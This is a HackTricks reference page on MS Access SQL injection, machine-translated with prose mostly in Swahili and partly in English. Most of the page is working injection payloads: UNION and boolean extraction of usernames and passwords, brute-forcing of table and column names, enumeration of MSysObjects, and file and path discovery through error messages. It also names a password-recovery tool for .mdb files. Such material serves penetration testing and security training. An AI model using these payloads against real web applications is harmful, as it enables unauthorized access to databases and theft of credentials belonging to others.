MS Access SQL Injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Online Playground

https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1

DB Limitations

String Concatenation

Kuunganisha nyuzi kunawezekana kwa kutumia wahusika & (%26) na + (%2b).

1' UNION SELECT 'web' %2b 'app' FROM table%00
1' UNION SELECT 'web' %26 'app' FROM table%00

Maoni

Hakuna maoni katika MS access, lakini inaonekana inawezekana kuondoa ya mwisho ya swali kwa kutumia herufi ya NULL:

1' union select 1,2 from table%00

Ikiwa hii haifanyi kazi, unaweza kila wakati kurekebisha sintaksia ya swali:

1' UNION SELECT 1,2 FROM table WHERE ''='

Stacked Queries

Haziruhusiwi.

LIMIT

Mwandiko wa LIMIT haujawekwa. Hata hivyo, inawezekana kupunguza matokeo ya swali la SELECT kwa safu za kwanza N za jedwali kwa kutumia mwandiko wa TOP. TOP inakubali kama hoja nambari, ikiwakilisha idadi ya safu zitakazorejeshwa.

1' UNION SELECT TOP 3 attr FROM table%00

Just like TOP you can use LAST which will get the rows from the end.

UNION Queries/Sub queries

In a SQLi you usually will want to somehow execute a new query to extract information from other tables. MS Access always requires that in subqueries or extra queries a FROM is indicated. So, if you want to execute a UNION SELECT or UNION ALL SELECT or a SELECT between parenthesis in a condition, you always need to indicate a FROM with a valid table name. Therefore, you need to know a valid table name.

-1' UNION SELECT username,password from users%00

Chaining equals + Substring

Hii itakuruhusu kutoa thamani za jedwali la sasa bila kuhitaji kujua jina la jedwali.

MS Access inaruhusu sintaksia za ajabu kama '1'=2='3'='asd'=false. Kama kawaida, SQL injection itakuwa ndani ya WHERE clause tunaweza kuitumia hiyo.

Fikiria una SQLi katika hifadhidata ya MS Access na unajua (au umekisia) kwamba jina moja la safu ni username, na hiyo ndiyo sehemu unayotaka kutoa. Unaweza kuangalia majibu tofauti ya programu ya wavuti wakati mbinu ya chaining equals inatumika na kwa uwezekano kutoa maudhui kwa kutumia boolean injection kwa kutumia Mid function kupata substrings.

'=(Mid(username,1,3)='adm')='

Ikiwa unajua jina la jedwali na safu ya kutupa unaweza kutumia mchanganyiko kati ya Mid, LAST na TOP ili kuvuja taarifa zote kupitia boolean SQLi:

'=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='

Feel free to check this in the online playground.

Brute-forcing Majina ya Meza

Using the chaining equals technique you can also bruteforce table names with something like:

'=(select+top+1+'lala'+from+<table_name>)='

Unaweza pia kutumia njia ya jadi zaidi:

-1' AND (SELECT TOP 1 <table_name>)%00

Feel free to check this in the online playground.

Sqlmap majina ya kawaida ya meza: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt
Kuna orodha nyingine katika http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html

Brute-Forcing Majina ya Safu

Unaweza kujaribu majina ya safu za sasa kwa kutumia hila ya kuunganisha sawa na:

'=column_name='

Au kwa group by:

-1' GROUP BY column_name%00

Au unaweza kutumia brute-force majina ya safu za meza tofauti na:

'=(SELECT TOP 1 column_name FROM valid_table_name)='

-1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00

Dumping data

Tumesha jadili mbinu ya kuunganisha sawa kutoa data kutoka kwa jedwali la sasa na mengine. Lakini kuna njia nyingine:

IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')

Kwa kifupi, ombi linatumia taarifa ya "if-then" ili kuanzisha "200 OK" katika kesi ya mafanikio au "500 Internal Error" vinginevyo. Kwa kutumia opereta ya TOP 10, inawezekana kuchagua matokeo kumi ya kwanza. Matumizi ya baadaye ya LAST yanaruhusu kuzingatia tuple ya 10 tu. Kwenye thamani hiyo, kwa kutumia opereta ya MID, inawezekana kufanya kulinganisha rahisi la herufi. Kwa kubadilisha ipasavyo index ya MID na TOP, tunaweza kutoa maudhui ya uwanja wa "username" kwa safu zote.

Wakati Kulingana

Angalia https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN

Kazi Nyingine za Kuvutia

Mid('admin',1,1) pata sehemu ya herufi kutoka nafasi 1 urefu 1 (nafasi ya awali ni 1)
LEN('1234') pata urefu wa mfuatano
ASC('A') pata thamani ya ascii ya herufi
CHR(65) pata mfuatano kutoka thamani ya ascii
IIF(1=1,'a','b') kama kisha
COUNT(*) Hesabu idadi ya vitu

Kuorodhesha meza

Kutoka hapa unaweza kuona ombi la kupata majina ya meza:

select MSysObjects.name
from MSysObjects
where
MSysObjects.type In (1,4,6)
and MSysObjects.name not like '~*'
and MSysObjects.name not like 'MSys*'
order by MSysObjects.name

Hata hivyo, kumbuka kwamba ni kawaida kupata SQL Injections ambapo huna ufaccess wa kusoma jedwali MSysObjects.

Ufikiaji wa Mfumo wa Faili

Njia Kamili ya Katalogi ya Mtandao

Ujuzi wa njia kamili ya katalogi ya mtandao unaweza kusaidia mashambulizi zaidi. Ikiwa makosa ya programu hayajafichwa kabisa, njia ya katalogi inaweza kufichuliwa kwa kujaribu kuchagua data kutoka kwa hifadhidata isiyokuwepo.

http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00

MS Access inajibu kwa ujumbe wa kosa unaoelezea njia kamili ya katalogi ya mtandao.

Uhesabuji wa Faili

Vector ifuatayo ya shambulio inaweza kutumika kujua uwepo wa faili kwenye mfumo wa mbali. Ikiwa faili iliyoainishwa ipo, MS Access inasababisha ujumbe wa kosa ukisema kwamba muundo wa hifadhidata si sahihi:

http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00

Njia nyingine ya kuhesabu faili inajumuisha kuainisha kipengee cha hifadhidata.jedwali. Ikiwa faili iliyoainishwa ipo, MS Access inaonyesha ujumbe wa kosa la muundo wa hifadhidata.

http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00

Kukisia Jina la Faili .mdb

Jina la faili la hifadhidata (.mdb) linaweza kufahamika kwa kutumia uchunguzi ufuatao:

http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00

Ambapo name[i] ni jina la faili la .mdb na realTable ni jedwali lililopo ndani ya hifadhidata. Ingawa MS Access kila wakati itasababisha ujumbe wa kosa, inawezekana kutofautisha kati ya jina la faili lisilo sahihi na jina la faili la .mdb lililo sahihi.

Kivunja Nenosiri la .mdb

Access PassView ni chombo cha bure ambacho kinaweza kutumika kurejesha nenosiri kuu la hifadhidata ya Microsoft Access 95/97/2000/XP au Jet Database Engine 3.0/4.0.

Marejeleo

http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousSQL Injection NextMSSQL Injection

Last updated 7 days ago